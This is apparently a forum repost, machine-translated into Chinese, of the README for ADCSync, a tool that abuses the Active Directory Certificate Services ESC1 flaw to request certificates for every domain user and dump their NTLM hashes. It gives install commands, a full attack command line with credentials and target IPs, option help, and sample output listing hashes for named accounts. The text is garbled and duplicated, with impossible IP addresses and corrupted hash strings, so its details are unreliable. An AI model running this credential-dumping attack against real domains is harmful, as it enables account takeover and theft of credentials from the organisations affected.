taibeihacker
Moderator
这是我快速搅动使用ESC1的DCSYNC的工具。它非常慢,但是否则是执行临时DCSYNC攻击的有效方法,而无需使用Drsuapi或音量阴影副本。
这是该工具的第一个版本,基本上只是自动化对域中每个用户运行证书的过程。它仍然需要大量工作,我计划将来添加更多功能,以进行身份验证方法并自动化查找脆弱模板的过程。
python3 adcsync.py -u clu -p Perfectsystem -ca theGrid -kflynn -dc -ca -template smartCard -target -ip 192.168.0.0.0.0.0.98 -dc -ip 192.168.0.0.0.0.98 -f user
______ ______________
/|/__ \/____/____/______ _______________
//| |///////\ __ \////////__ \/___//___ /
/___ |//_//////_____////////////点//////////////////////////////////////////////__
/_/| _/_____/\ ____ //___/\ _____,/_//_/_/\ ___//\ ___//
/____/
获取用户证书:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:1800:00,1.32S/it]
THEGRID.LOCAL/shirlee.saraann:aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:
THEGRID.LOCAL/rosanne.nert:aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:
thegrid.local/edita.lauree3:AAD3B435B51404EEAAD3B435B51404E E:B212294E06A0757547D66B78BB632D693333333333333333333333333333333333:
THEGRID.LOCAL/carol.elianore:aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:
THEGRID.LOCAL/astrid.lotte:aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:
THEGRID.LOCAL/louise.hedvig:aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:
THEGRID.LO CAL/janelle.jess:aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:
THEGRID.LOCAL/marie-ann.kayle:aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:
thegrid.local/jeanie.isa:aad3b435b51404eeaaad3b435b51404ee :61F8C2BF0DC5793A578AA2BC835F2E5333333333333333333333333333333:10-1010 ADCSYNC使用ESC1漏洞利用在Active Directory环境中从用户帐户中转换NTLM哈希。该工具将首先在传递的“血腥猎犬”文件中获取每个用户和域。然后,它将使用certipy向每个用户提出请求,并将其PFX文件存储在证书目录中。最后,它将使用证书对证书进行身份验证,并为每个用户检索NT哈希。这个过程非常慢,可能需要一段时间才能完成,但提供了一种倾倒NTLM哈希的替代方法。
CD ADCSYNC
pip3 install -r unigess.txt
有效的域凭证从将通过的血犬转储中的用户列表。
______ ______________
/|/__ \/____/____/______ _______________
//| |///////\ __ \////////__ \/___//___ /
/___ |//_//////_____////////////点//////////////////////////////////////////////__
/_/| _/_____/\ ____ //___/\ _____,/_//_/_/\ ___//\ ___//
/____/
USAGE: ADCSYNC.PY [选项]
Options:
-f, - 文件文本输入用户列表JSON文件[必需]
-o, - 输出文本NTLM哈希输出文件[必需]
-CA文本证书授权[必需]
-DC-IP域控制器的文本IP地址[必需]
-U, - 用户文本用户名[必需]
-p, - password文本密码[必需]
- 模板文本模板名称容易受到ESC1的影响[必需]
-target-IP文本IP地址[必需]
- 主持人显示此消息和退出。
这是该工具的第一个版本,基本上只是自动化对域中每个用户运行证书的过程。它仍然需要大量工作,我计划将来添加更多功能,以进行身份验证方法并自动化查找脆弱模板的过程。
python3 adcsync.py -u clu -p Perfectsystem -ca theGrid -kflynn -dc -ca -template smartCard -target -ip 192.168.0.0.0.0.0.98 -dc -ip 192.168.0.0.0.0.98 -f user
______ ______________
/|/__ \/____/____/______ _______________
//| |///////\ __ \////////__ \/___//___ /
/___ |//_//////_____////////////点//////////////////////////////////////////////__
/_/| _/_____/\ ____ //___/\ _____,/_//_/_/\ ___//\ ___//
/____/
获取用户证书:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:1800:00,1.32S/it]
THEGRID.LOCAL/shirlee.saraann:aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:
THEGRID.LOCAL/rosanne.nert:aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:
thegrid.local/edita.lauree3:AAD3B435B51404EEAAD3B435B51404E E:B212294E06A0757547D66B78BB632D693333333333333333333333333333333333:
THEGRID.LOCAL/carol.elianore:aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:
THEGRID.LOCAL/astrid.lotte:aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:
THEGRID.LOCAL/louise.hedvig:aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:
THEGRID.LO CAL/janelle.jess:aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:
THEGRID.LOCAL/marie-ann.kayle:aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:
thegrid.local/jeanie.isa:aad3b435b51404eeaaad3b435b51404ee :61F8C2BF0DC5793A578AA2BC835F2E5333333333333333333333333333333:10-1010 ADCSYNC使用ESC1漏洞利用在Active Directory环境中从用户帐户中转换NTLM哈希。该工具将首先在传递的“血腥猎犬”文件中获取每个用户和域。然后,它将使用certipy向每个用户提出请求,并将其PFX文件存储在证书目录中。最后,它将使用证书对证书进行身份验证,并为每个用户检索NT哈希。这个过程非常慢,可能需要一段时间才能完成,但提供了一种倾倒NTLM哈希的替代方法。
Introduction
GIT克隆https://github.com/jpg0mez/adcsync.gitCD ADCSYNC
pip3 install -r unigess.txt
Installation
要使用此工具,我们需要以下内容:有效的域凭证从将通过的血犬转储中的用户列表。
______ ______________
/|/__ \/____/____/______ _______________
//| |///////\ __ \////////__ \/___//___ /
/___ |//_//////_____////////////点//////////////////////////////////////////////__
/_/| _/_____/\ ____ //___/\ _____,/_//_/_/\ ___//\ ___//
/____/
USAGE: ADCSYNC.PY [选项]
Options:
-f, - 文件文本输入用户列表JSON文件[必需]
-o, - 输出文本NTLM哈希输出文件[必需]
-CA文本证书授权[必需]
-DC-IP域控制器的文本IP地址[必需]
-U, - 用户文本用户名[必需]
-p, - password文本密码[必需]
- 模板文本模板名称容易受到ESC1的影响[必需]
-target-IP文本IP地址[必需]
- 主持人显示此消息和退出。